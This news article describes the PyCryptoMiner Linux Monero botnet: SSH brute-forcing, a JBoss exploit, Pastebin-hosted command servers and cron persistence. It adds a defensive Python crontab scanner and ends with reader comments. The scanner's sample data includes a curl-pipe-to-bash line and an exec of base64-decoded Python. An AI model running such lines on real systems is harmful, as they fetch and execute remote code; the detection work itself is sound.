A Linux-based Monero mining botnet, dubbed PyCryptoMiner, has been discovered by security researchers. The botnet, which is built around a cryptocurrency miner, has earned its operators at least 158 Monero, roughly $63,000.
PyCryptoMiner is written in Python, which has helped the botnet’s operators keep it under the radar.
“Unlike a binary malware alternative, a scripting language-based malware is more evasive by nature as it can be easily obfuscated. It is also executed by a legitimate binary, which could be one of the PERL/Python/Bash/Go/PowerShell interpreters shipped with almost every Linux/Windows distribution,” researchers from F5 Networks said in their report.
PyCryptoMiner Technical Details
The botnet’s operators use brute-force attacks against Linux systems with exposed SSH ports. Once a password is guessed, they deploy Python scripts and install the Monero miner malware.
Researchers also believe the operators are using an exploit for JBoss servers, tracked as CVE-2017-12149, in the campaign. SSH brute-forcing nonetheless remains part of their attack arsenal.
Notably, PyCryptoMiner does not hard-code the addresses of its command and control servers; it retrieves them from Pastebin posts. The bot can also act as a scanner node: it scans the Internet for Linux machines with open SSH ports and attempts to guess their SSH logins. On success, the malware uses a simple base64-encoded “spearhead” Python script that connects to the command and control server to fetch and execute more Python code, the researchers said. The script itself is located on the main controller bot and is capable of the following activities:
- Becoming persistent on the compromised machine by registering as a cron job (a time-based job scheduler in Unix-like operating systems);
- Collecting details about the compromised machine, such as the number of CPUs;
- Sending the collected information to the command and control server.
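A defender-side check for the cron persistence and base64-encoded spearhead pattern described above, written as an added example (not code from the F5 report or from the malware itself). The crontab lines and the Pastebin URL are constructed samples, not indicators from the campaign.

```python
import base64
import binascii
import re

# Constructed sample crontab (not taken from the report). Line 2 mimics
# cron persistence that runs a base64-encoded Python payload; line 3
# mimics fetching a stage from a Pastebin post. Line 1 is benign.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * python -c "exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldA=='))"
*/5 * * * * curl -s https://pastebin.com/raw/PLACEHOLDER | bash
"""

INTERPRETER_RE = re.compile(r"\b(?:python[23]?|perl|bash|sh)\b")
DECODE_RE = re.compile(r"b64decode|base64\s+(?:-d|--decode)")
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
PASTEBIN_RE = re.compile(r"pastebin\.com", re.IGNORECASE)


def decode_literal(token):
    """Decode a quoted base64 literal to text; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_crontab(text):
    """Return findings for crontab lines matching the persistence pattern above."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if INTERPRETER_RE.search(line) and DECODE_RE.search(line):
            reasons.append("interpreter runs base64-decoded payload")
        if PASTEBIN_RE.search(line):
            reasons.append("fetches stage from pastebin.com")
        if not reasons:
            continue
        # Show the analyst what the encoded payload actually is, where it decodes.
        decoded = [d for d in map(decode_literal, B64_LITERAL_RE.findall(line)) if d]
        findings.append({"line": line, "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in scan_crontab(SAMPLE_CRONTAB):
        print(finding["line"])
        print("  reasons:", finding["reasons"], "decoded:", finding["decoded"])
```

On a real host, feed it the output of `crontab -l` for each user plus the contents of `/etc/cron.d`; the same two regexes also work over shell history or process command lines.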
PyCryptoMiner Botnet Activity
The botnet currently appears to be inactive, as its servers are offline. This does not mean it won’t be reactivated in new crypto mining campaigns: if the operator updates the Pastebin posts to point to a new command and control server, the botnet can quickly be brought back online.
As mentioned above, the botnet is also designed to look for systems that can be exploited via CVE-2017-12149, a recently disclosed vulnerability. Vulnerable JBoss servers may therefore be PyCryptoMiner’s next target.
This is hardly malware. If you get access to the machine, you can do a lot of things other than just running a mining script.
Hello, yes, but it all comes down to who configured it. Some malware authors often aim to embed legitimate miners in malware applications and add other “things” that the malware does. These are functions that help it propagate as well as self-update, copy itself and remain obfuscated.
As stated in the article, the miner is part of an extensive Python script that is modular in nature. As a consequence, the hacker operators can execute a variety of malware behaviours.
Due to the recent rise of miners, it is important for us to track all current events.